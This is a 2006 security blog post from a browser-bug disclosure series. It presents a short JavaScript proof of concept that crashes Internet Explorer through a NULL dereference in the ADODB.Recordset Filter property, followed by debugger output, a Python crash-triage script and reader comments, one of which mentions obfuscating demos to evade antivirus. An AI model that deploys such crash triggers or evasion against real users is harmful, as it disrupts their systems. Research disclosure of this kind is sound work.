Sunday, July 02, 2006

MoBB #1: ADODB.Recordset Filter Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.

a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }

Demonstration

eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference.
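
The debugger output above can be triaged mechanically. The following Python is an added example, not code from the original post; the function name triage and the 64 KB null-page threshold are assumptions. It resolves the faulting memory operand and classifies the crash as a read from an unmapped address near NULL, which matches the OSVDB title.

```python
import re

# Debugger output copied verbatim from the post above.
CRASH = """\
eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????
"""

# Assumption: the first 64 KB of a Win32 user-mode address space is never mapped.
NULL_PAGE_LIMIT = 0x10000


def triage(dump):
    """Classify a WinDbg-style x86 fault from its registers and faulting instruction."""
    regs = {n: int(v, 16) for n, v in re.findall(r"\b(e[a-z]{2})=([0-9a-f]{8})\b", dump)}
    symbol = re.search(r"^(\S+![^\n]*?\+0x[0-9a-f]+):$", dump, re.M)
    insn = re.search(
        r"^([0-9a-f]{8}) [0-9a-f]+ (\w+) (.+?) [a-z]{2}:[0-9a-f]{4}:([0-9a-f]{8})=(\S+)$",
        dump, re.M)
    if not insn:
        raise ValueError("no faulting instruction with a memory operand found")
    addr, mnemonic, operands, target, value = insn.groups()
    if int(addr, 16) != regs.get("eip"):
        raise ValueError("instruction line does not match eip")
    target = int(target, 16)
    ops = [o.strip() for o in operands.split(",")]
    # Intel syntax puts the destination first; cmp and test only read their operands.
    writes = ops[0].startswith("[") and mnemonic not in ("cmp", "test")
    # Registers inside the brackets are the ones that produced the bad address.
    mem = next(o for o in ops if o.startswith("["))
    return {
        "symbol": symbol.group(1) if symbol else None,
        "access": "write" if writes else "read",
        "address": target,
        "unmapped": set(value) == {"?"},  # debugger prints ? for unreadable memory
        "near_null": target < NULL_PAGE_LIMIT,
        "address_regs": {r: regs[r] for r in re.findall(r"e[a-z]{2}", mem)},
    }


if __name__ == "__main__":
    print(triage(CRASH))
```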

6 Comments:

At 8:01 AM, Anonymous Chris said...

IE 7 beta 3 still crashes, but first you'll have to accept the ActiveX

 
At 8:38 AM, Anonymous Duke said...

With IE6 SP2 you have to click in order to download the ActiveX. So it's not dangerous.

 
At 6:42 PM, Anonymous Josh said...

I disagree with your "you have to click" ... "So it's not dangerous." comment. If someone puts any thought at all into Social Engineering regarding this or any exploit then it can be dangerous. Disregarding something because you have to click on something else is exactly the problem. Think before you click...

 
At 7:36 AM, Anonymous Anonymous said...

Clicked on the "Demonstration" link here. Trend immediately quarantined HTML_IECRASHC.C even before loading the "real" demo page.

 
At 8:36 AM, Blogger hdm said...

Looks like Trend is adding AV sigs for each of these - kind of pointless, considering how easy it is to obfuscate evil JavaScript. The relevant link is:

HTML_IECRASH.C

If the AVs start getting annoying, I will auto-obfuscate the Demonstration pages on the backend. Thanks for the heads up.

 
At 5:55 PM, Anonymous Anonymous said...

This bug affects both IE6 and IE7.

 
